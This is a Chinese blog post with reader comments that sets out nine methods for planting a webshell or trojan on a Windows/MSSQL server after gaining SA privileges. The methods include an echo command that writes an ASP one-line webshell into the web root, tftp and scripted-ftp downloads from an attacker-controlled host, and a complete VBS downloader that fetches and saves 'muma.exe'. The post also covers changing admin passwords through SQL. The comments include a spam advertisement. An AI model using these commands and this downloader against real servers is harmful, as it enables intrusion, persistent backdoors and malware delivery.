SA权限权利非常大,但可能有的朋友感觉使用起来不方便,接下来和大家一起讨论几种上传文件的方法,如果还有别的方法,希望大家能分享出来.
1、NBSI的命令方法:写入一句话木SHELL,命令如下:
1 | echo ^<25%execute request("#")25%^> >d:\web\mm.asp |
这样要写入一句话木马,如果说被杀软,KILL掉,就可以连上去了。net stop “服务名”可以停掉服务。
2、NBSI3.0自带文件上传功能,也可以使用。缺点速度慢。建议上传短小的WEBSHELL。
3、把一句话木马与入数据库,然后利用NBSI数据库差异备份功能。
4、如网站有论坛且开放上传附件功能,可直接在论坛上传文件(把WEBSHELL改成可能上传的文件类型,如JPG,GIF)
5、利用NBSI等注入工具,浏览网站数据库连接文件(前提数据库和WEB在一台机器上,可利用IPCNFIG /ALL命令判断)找出SA的连接密码。利用MSSQL2000自带的事件查询分析器,连数库机器,通过浏览数据库找出后台密码,如果是MD5可利用Update语句进行更改也可利用Insert加入一新用户,不用在爆破MD5,进入后台,寻找上传WEBSHELL方法。
6、tftp命令法: TFTP [-i] host [GET | PUT] source [destination] 首先在自己的机器或已经控制的肉鸡上开TFTP服务,工具:TFTP32.EXE不错。比如:肉鸡IP:192.168.1.1 具有SA权限的机器是192.168.1.2 执行命令:
1 | tftp -i 192.168.1.1 get webshell.asp d:\web\webshell.asp |
如果成功,就会在192.168.1.2的D盘web 目录下生成文件:webshell.asp
7、ftp方法:前提是有一个可访问的外网FTP空间().命令ECHO命令,前面讲的方法:在目标机器上生成文件ftp.txt
1 2 3 4 5 6 | echo open www.ftp.com>ftp.txt //连接FTP echo username>>ftp.txt //输入用户名 echo password>>ftp.txt //输入密码 echo get webshell.asp d:\web\webshell.asp>>ftp.txt //执行下载命令 echo bye>>ftp.txt //退出 ftp -s:ftp.txt //执行FTP.TXT文件中的FTP命令 |
8、vbs脚本方法:
利用ECHO命令写入文件: get.vbs,内容如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 | On Error Resume Next
Dim iRemote,iLocal
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal,2 |
然后命令行下执行:cscript get.vbs http://ip/muma.exe c:\muma.exe
9、start命令法,此方法不常用,但也是一种方法,
start http://ip/a.html这候a.html文件以及它包括的图片会保存在机器的,如果我们把自己的程序改名为a.jpg嵌套在a.html中这时候可以下载到IE缓存中。可以利用dir /s a*.jpg进行搜索。如搜索到,可以利用COPY命令复制出来。
星期四, 三月 4, 2010 at 9:26
情缘世家上海婚纱摄影工作室推出苏州外景婚纱摄影优惠团购。2009的婚纱照价格,全外景婚纱摄影,众多北京、上海、无锡及全国各地的新人来拍摄苏州外景婚纱照!5年来,拍摄数千对上海顾客的结婚照,成为苏州婚纱摄影界的佳话。推出苏州度假婚纱摄影后,深受上海准新娘的追捧。凭我们对苏州自然山水的深刻理解结合你们的完美演绎,不断的在创造出一幅幅动人的婚纱摄影作品。
情缘世家苏州婚纱摄影网站:http://www.suzhouphoto.com
星期二, 十二月 22, 2009 at 8:32
难道说博主就是那传说中HACKER?哇咔咔!想得到SA权限,到国外去吧!而且是小国家去,可能得到。呵呵!几年前就很不容易了,现在几乎绝种!
星期二, 十二月 22, 2009 at 8:35
非也,国内还如此之多.
星期二, 十二月 22, 2009 at 9:07
你胆子真大,居然还敢弄国内的!啊哦!主啊,保佑我可怜的孩子别出事!啊门!
星期二, 十二月 22, 2009 at 9:09
当然不是,朋友,让大家了解一下,好做好防护.
星期二, 十二月 22, 2009 at 9:35
嘿嘿,出发点是好的!但是怕PIL-CE不那么想了!
星期六, 十二月 19, 2009 at 23:10
话说注入拿到sa权限,马上去买彩票去
星期四, 十二月 17, 2009 at 19:19
好久没来了 过来看看 呵呵!
星期二, 十二月 15, 2009 at 22:11
都是技术文哦,额,看不懂啊。。。
星期二, 十二月 15, 2009 at 6:14
这个写的很详细了,以前遇到SA的,我大多是直接上传小马,或者就是备份丢后门了.
星期天, 十二月 13, 2009 at 15:18
一般让它主动下载木马,然后CMD运行
星期天, 十二月 13, 2009 at 6:39
翔子来看你了 朋友~
星期五, 十二月 11, 2009 at 9:46
好好学习学习
我还半懂不懂呢。
星期四, 十二月 10, 2009 at 22:22
我是想学习,可惜……
星期四, 十二月 10, 2009 at 17:37
这文章还真没看明白~~~
星期四, 十二月 10, 2009 at 10:17
你这里的东西我都看不懂
星期四, 十二月 10, 2009 at 9:22
这个真要好好跟你学学
星期四, 十二月 10, 2009 at 0:17
好久没看到过echo命令了=w=
星期四, 十二月 10, 2009 at 0:17
IP献上
星期四, 十二月 10, 2009 at 0:13
学习了,谢谢
星期四, 十二月 10, 2009 at 0:07
MSSQL安全得好好搞啊
星期三, 十二月 9, 2009 at 23:56
真得注意了
星期三, 十二月 9, 2009 at 23:53
俺是PHP+MYSQL
星期三, 十二月 9, 2009 at 22:40
这玩意除了ftp还真没听说过呀